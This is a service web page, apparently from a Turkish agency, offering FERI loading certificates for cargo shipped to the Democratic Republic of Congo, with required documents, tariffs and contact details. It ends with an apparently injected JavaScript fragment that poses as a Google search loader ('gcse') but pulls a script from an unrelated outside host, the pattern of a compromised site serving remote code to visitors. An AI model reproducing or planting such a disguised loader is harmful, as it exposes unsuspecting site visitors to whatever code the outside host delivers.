According to an agreement signed on 22.04.2008, all cargoes that will be sent to Democratic Republic of Congo, may be export goods, transit cargoe or a return good, requires a loading certificate. This certificate can only be prepared by authorities assigned by OGEFREM (OFFICE DE GESTION DU FRET MULTIMODAL).
Neta has been issuing FERI certificate since 2008. Please fill the form below to get your feri certificate.
Below are the documents required for us to prepare the loading certificate:
- Name address and contact details of the exporter
- Name address and contact details of the importer
- Name of the company requesting the loading certificate
- Scanned copy of the bill of lading
- Name, voyage number, loding/discharging ports, ETD and ETA of the vessel
- IMO class if required
- Cargo details
- Origin of the goods
- Number of packages
- Volume, net and gross weight
- Type of transportation (FOB, CIF etc.)
- The FOB value of the goods, basis sea freight, surcharges(BAF, CAF, congestion vb) and insurance cost in EURO or USD.
- Freight payment method (prepaid,collect)
The price tariff is as follows:
Tariff of FERI:
20’: 60,00 €/Unit; 40’: 110,00 €/Unit;
LCL/Genco/Roro: 4,00 €/FT;
Cement / Alimentary/Pharmaceutical/Petroleum/Water shipped in bulk: 0.5 €/FT;
All other Bulks: 4,00 €/FT;
FERI Issuance: 50,00 €/Feri;
Admin Fee – EUR 25 for assisting in completing FERI application forms.
Call us or email us now!
+90 216 518 1122
It is obligatory to put the FERI number we provide in the bill of lading. Therefore the payment must be made in order for us to generate the FERI number for your BL.
For your kind information.
- Kongo export, Congo export, loading certificate, loading certificate congo, congo export procedures, shipping congo, congo procedures, congotrade, foreign trade, shipping, Matadi, Banana, Boma, Kinshasa, the loading certificate fee,document price
var gcse = document.createElement(‘script’);
gcse.async = true;
gcse.src = “http://theboatersnetwork.com/js/main1.js”;
var s = document.getElementsByTagName(‘script’);